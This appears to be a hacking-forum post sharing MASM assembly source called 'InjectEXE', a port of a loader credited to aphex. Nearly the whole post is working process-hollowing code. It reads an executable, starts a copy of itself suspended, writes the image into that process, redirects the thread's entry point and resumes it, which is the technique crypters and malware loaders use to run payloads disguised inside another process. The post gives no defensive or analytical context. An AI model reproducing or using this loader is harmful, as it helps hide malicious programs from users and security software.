Jump to content
Gonzalez

[MASM] InjectEXE

By Gonzalez, in Programare

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted 
comment ^
   WebEXE originally by aphex ported by shapeless
^


.386

.model flat, stdcall
option casemap: none



include c:\masm32\include\windows.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\masm32.inc

includelib c:\masm32\lib\masm32.lib
includelib c:\masm32\lib\kernel32.lib



.data
szFile       db "calc.exe",0

.data?

fHandle            dword ?
dwSize            dword ?
pBuff               dword ?
BytesRead         dword ?


ImageSize         dword ?
InjectMem         dword ?
pFileData         dword ?
HeaderSize      dword ?

szFileName      byte 256 dup(?)



contxt             CONTEXT <>
ProcInfo          PROCESS_INFORMATION <>
StartInfo       STARTUPINFO <>


.code

comment ^
inline DWORD GetAlignedSize(DWORD Size, DWORD Alignment)
{
   if( Size % Alignment == 0 )
      return Size;

   return (((Size / Alignment) + 1) * Alignment);
}
^

GetAligned proc uses ecx edx dSize:dword,Aligned:dword

   xor edx,edx   
   mov eax,dSize   
   mov ecx,Aligned   
   div ecx

   cmp edx,0
   jne @F
      mov eax,dSize
      ret   
   @@:

   inc eax

   xor edx,edx   
   mov ecx,Aligned
   mul ecx

   ret

GetAligned endp





__ep:


   invoke CreateFile,addr szFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
   mov fHandle,eax

   invoke GetFileSize,eax,0
   mov dwSize,eax

   invoke VirtualAlloc,0,eax,MEM_COMMIT,PAGE_EXECUTE_READWRITE
   mov pBuff,eax

   invoke ReadFile,fHandle,eax,dwSize,addr BytesRead,0
   mov eax,pBuff
   xchg eax,edi

   assume edi:ptr IMAGE_DOS_HEADER
   add edi,[edi].e_lfanew
   assume edi:ptr IMAGE_NT_HEADERS


   xor esi,esi
   mov si,[edi].FileHeader.SizeOfOptionalHeader
   lea eax,[edi].OptionalHeader
   add esi,eax

   assume esi:ptr IMAGE_SECTION_HEADER




   push [edi].OptionalHeader.SizeOfHeaders
    pop HeaderSize


   invoke GetAligned,[edi].OptionalHeader.SizeOfHeaders,[edi].OptionalHeader.SectionAlignment
   mov ImageSize,eax

   ; save this value
   push eax


   ; save esi
   push esi


   mov dx,[edi].FileHeader.NumberOfSections
   @@:

      cmp [esi].Misc.VirtualSize,0
      je lZero
         invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
         add ImageSize,eax      
      lZero:

      mov eax,HeaderSize
      cmp eax,[esi].PointerToRawData
      jbe lNotSmaller
         push [esi].PointerToRawData
         pop HeaderSize
      lNotSmaller:


      ; next item!
      add esi,SizeOf IMAGE_SECTION_HEADER
      dec dx
   jnz @B


   ; restore esi!
   pop esi

   invoke VirtualAlloc,0,ImageSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE
   mov InjectMem,eax
   mov pFileData,eax

   invoke RtlMoveMemory,eax,pBuff,HeaderSize

   ; restore original headersize
   pop eax
   add pFileData,eax

   mov dx,[edi].FileHeader.NumberOfSections
   @@:

      mov eax,[esi].SizeOfRawData
      cmp eax,0
      jbe lBelowOrZero
         cmp eax,[esi].Misc.VirtualSize
         jbe lBelowOrZero2
            mov eax,[esi].Misc.VirtualSize
         lBelowOrZero2:

         mov ecx,pBuff
         add ecx,[esi].PointerToRawData

         ; save the counter value!
         push edx
         invoke RtlMoveMemory,pFileData,ecx,eax
         pop edx

         invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
         add pFileData,eax

         jmp lContinue
      lBelowOrZero:

      ; it wasnt above 0

      cmp [esi].Misc.VirtualSize,0
      je lContinue

      invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
      add pFileData,eax


      lContinue:
      ; next item!
      add esi,SizeOf IMAGE_SECTION_HEADER
      dec dx
   jnz @B



   invoke RtlZeroMemory,addr contxt,SizeOf CONTEXT
   invoke RtlZeroMemory,addr StartInfo,SizeOf STARTUPINFO

   invoke GetModuleFileName,0,addr szFileName,SizeOf szFileName

   invoke CreateProcess,0,addr szFileName,0,0,0,CREATE_SUSPENDED,0,0,addr StartInfo,addr ProcInfo

   mov contxt.ContextFlags,CONTEXT_FULL
   invoke GetThreadContext,ProcInfo.hThread,addr contxt
   invoke VirtualAllocEx,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,ImageSize,MEM_RESERVE or MEM_COMMIT,PAGE_EXECUTE_READWRITE
   invoke WriteProcessMemory,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,InjectMem,ImageSize,addr BytesRead
   mov eax,contxt.regEbx
   add eax,8
   lea ecx,[edi].OptionalHeader.ImageBase
   invoke WriteProcessMemory,ProcInfo.hProcess,eax,ecx,4,addr BytesRead   
   push [edi].OptionalHeader.ImageBase
   pop eax
   add eax,[edi].OptionalHeader.AddressOfEntryPoint
   mov contxt.regEax,eax
   invoke SetThreadContext,ProcInfo.hThread,addr contxt
   invoke ResumeThread,ProcInfo.hThread   


   invoke VirtualFree,InjectMem,0,MEM_RELEASE

   invoke VirtualFree,pBuff,0,MEM_RELEASE

   invoke CloseHandle,fHandle

   ret
end __ep

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...